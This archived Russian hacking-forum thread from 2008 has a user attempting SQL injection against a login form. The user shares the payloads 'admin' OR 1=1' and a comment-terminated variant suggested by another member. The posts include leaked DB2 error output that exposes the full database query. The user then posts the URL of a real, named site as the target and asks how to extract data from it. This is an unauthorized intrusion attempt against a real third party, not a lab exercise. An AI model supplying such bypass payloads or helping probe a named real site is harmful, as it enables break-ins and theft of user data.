Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

вопрос о запросе

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> вопрос о запросе
Имя
Сообщение << Старые топики   Новые топики >>
вопрос о запросе - 2008-08-06 16:47:27.620000   
muse

Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос
quote:

login=admin'+OR+1=1&password=qwerty


выдает следующую ошибку

quote:

[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'


из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает…

кто что может посоветовать ???
Post #: 1
RE: вопрос о запросе - 2008-08-06 16:49:38.350000   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
Запрос поменяй на login=admin'+OR+1=1/*&password=qwerty
Post #: 2
RE: вопрос о запросе - 2008-08-06 16:49:51.603333   
[ TRaY ]

Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
Пост восстановлен.:)
ТС, дай ссылку.
Post #: 3
RE: вопрос о запросе - 2008-08-06 16:56:40.120000   
muse

Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
я пробовал закрывать запрос результат тот же
Post #: 4
RE: вопрос о запросе - 2008-08-06 17:17:37.510000   
muse

Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
вот сцылк0 https://members.satgate.ru/index.php?login=1
Post #: 5
RE: вопрос о запросе - 2008-08-06 17:29:29.493333   
xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000
Я конечно не очень разбираюсь!!!но я написал char(27) и мне написало

quote:

[IBM][CLI Driver][DB2/LINUX] SQL0104N An unexpected token "END-OF-STATEMENT" was found following "in where client_id =". Expected tokens may include: "". SQLSTATE=42601 Attempted Query: select dt_in from mysql.last_login where client_id =

Post #: 6
RE: вопрос о запросе - 2008-08-07 13:24:45.700000   
muse

Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
так что из баги нельзя ниче вытянуть?
Post #: 7
Страниц:  [1]
Все форумы >> [В Сети] >> вопрос о запросе







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.